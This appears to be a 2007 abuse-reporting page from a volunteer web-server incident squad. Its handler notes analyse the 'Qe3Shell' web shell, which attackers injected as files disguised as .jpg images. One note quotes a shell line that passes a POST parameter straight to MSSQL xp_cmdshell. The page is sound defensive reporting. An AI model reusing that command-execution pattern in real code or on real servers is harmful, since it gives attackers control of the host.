Webserver Incident Reporting and Termination(TM) Squad
NOTE: Web servers have logs and in those logs is evidence of attempted hacking. For instance, one may notice an attack that calls such a script from a remote server "r57.php??". Its these kinds of attacks we're looking to investigate. For a concrete example, see these reports.
Please do not submit phish, spam, or malware to WsIRT. Only submit attack signatures from web server logs. As this project hasn't officially been publicly launched, we are still reclassifying the tool and its verbiage.
Paul: Extended information for AS30340:
State/Province: wa
Country: us
Responsible Domain: llix.net
Abuse Email: postmaster@llix.net
Handler Note: 01 Dec, 2007 19:05:02
Paul: The 1.jpg file for download upon inspection reveals a <title>#ulil security tester on dalnet Qe3</title>
name.
Handler Note: 01 Dec, 2007 19:09:24
Paul: The Qe3Shell not only permits access to the exploited web server, but it also established sql database connections. It
is claimed By * Ulil Hacker Security Tester* * http://ulga.by.ru in the source.
Handler Note: 01 Dec, 2007 19:12:34
Paul: One of the commands the Qe3shell executes is:
("insert into Qe3_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db)
Paul: We have found attackers attempting to inject the 3.jpg script to exploitable web servers. While investigating we found
files 2.jpg and 1.jpg which are also nefarious in nature. All scripts, if successfully injected into a remote web
server, permits criminals to gather intelligence on those systems, and even take control via the Qe3shell. Please
remove these immediately.
Handler Note: 01 Dec, 2007 19:17:38
Paul: Generated and sent email attack alert to respective parties.
Handler Note: 02 Dec, 2007 00:23:32
Paul: There are a handful of base64 encoded variables, which when decoded contain perl scripts that make Internet connections,
to say the least.
